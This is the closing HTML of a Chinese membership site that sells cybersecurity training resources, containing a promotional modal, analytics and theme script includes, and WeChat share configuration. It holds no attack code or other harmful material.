                    <div style="padding: 1px;"><div class="modal-colorful-header colorful-bg jb-yellow"><button class="close" data-dismiss="modal"><svg class="ic-close" aria-hidden="true"><use xlink:href="#icon-close"></use></svg></button><div class="colorful-make"></div><div class="text-center"><div class="em2x"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-vip_1"></use></svg></div><div class="mt10 em12 padding-w10">会员低价促销中~</div></div></div><div><body>
<p style="color: orange;">网安全量靶场无境上线，全网最便宜独立环境靶场！</p>
<p style="color: orange;">独家代码审计、凌风云自助获取、ICP信息批量查询等功能已上线</p>
<p style="color: green;">网络安全从拥有一个资源大全开始！</p>
<p style="color: orange;">现在购买仅需99元一年！续费还享八折！</p>
</body>
</div></div>                </div>
                <div class="modal-buts box-body notop text-right"><a type="button" target=_blank class="but radius c-blue" href="http://s.mrw.so/6XqGa">详细介绍</a><a type="button" class="but radius c-green" href="https://vip.bdziyi.com/index.php/user-sign/">注册登陆</a></div>            </div>
        </div>
    </div>
<script type="text/javascript">window.onload = function(){
        setTimeout(function () {$('#modal-system-notice').modal('show');
        $.cookie("showed_system_notice","showed", {path: "/",expires: 1});
    }, 500)};</script><script type="text/javascript" src="https://vip.bdziyi.com/wp-content/themes/zibll/js/libs/bootstrap.min.js?ver=8.3" id="bootstrap-js"></script>
<script type="text/javascript" src="https://vip.bdziyi.com/wp-content/themes/zibll/js/loader.js?ver=8.3" id="_loader-js"></script>
<script type="text/javascript" src="https://vip.bdziyi.com/wp-content/themes/zibll/inc/functions/bbs/assets/js/main.min.js?ver=8.3" id="forums-js"></script>
<script type="text/javascript" src="https://vip.bdziyi.com/wp-content/themes/zibll/inc/functions/shop/assets/js/main.min.js?ver=8.3" id="shop-js"></script>
<script type="text/javascript">var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?b1d5fe7471881173b0b5a05d2c916139";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();

var links = document.querySelectorAll('.item-tags a');

for (var i = 0; i < links.length; i++) {
  var randomColor;
  do {
    var r = Math.floor(Math.random() * 128) + 128;
    var g = Math.floor(Math.random() * 128) + 128;
    var b = Math.floor(Math.random() * 128) + 128;
    randomColor = 'rgb(' + r + ',' + g + ',' + b + ')';
  } while ((r * 0.299 + g * 0.587 + b * 0.114) > 200); // 确保亮度不超过200

  links[i].style.backgroundColor = randomColor;
}

//视频
$(document).ready(function() {
    $('#xiayg').on('click', function() {
        var $videoElement = $('.dplayer-video-wrap .dplayer-video.dplayer-video-current');

        if ($videoElement.length) {
            $videoElement.attr('src', 'https://api.86512.cn/api/web.php');
            $videoElement[0].load();
            $videoElement[0].play();
        } else {
            console.error('找不到视频元素');
        }
    });
});
</script>    <!--baidu_push_js-->
    <script type="text/javascript">
        (function() {
            var bp = document.createElement('script');
            var curProtocol = window.location.protocol.split(':')[0];
            if (curProtocol === 'https') {
                bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
            } else {
                bp.src = 'http://push.zhanzhang.baidu.com/push.js';
            }
            var s = document.getElementsByTagName("script")[0];
            s.parentNode.insertBefore(bp, s);
        })();
    </script>
    <!--baidu_push_js-->
    <script type="text/javascript">
        console.log("数据库查询：9次 | 页面生成耗时：702.046ms");
    </script>
<script type="text/javascript">
    window.WeChatShareDate = {
        appId: 'wx8c358971b57c3409',
        timestamp: '1765881885',
        nonceStr: 'TxHkNFPwB4q33bIe',
        signature: '6820ee777ecaa5cb1e00ae1e9a4f79b1726d9b86',
        url: 'https://vip.bdziyi.com/2070/',
        title: '',
        img: 'https://oss.bdziyi.com/vip/2024/03/20240324075052980.jpg',
        desc: '',
    }
</script>
        <script type="text/javascript">_win.signin_wx_priority = true;</script>
</body>
</html>
<!-- Performance optimized by Redis Object Cache. Learn more: https://wprediscache.com -->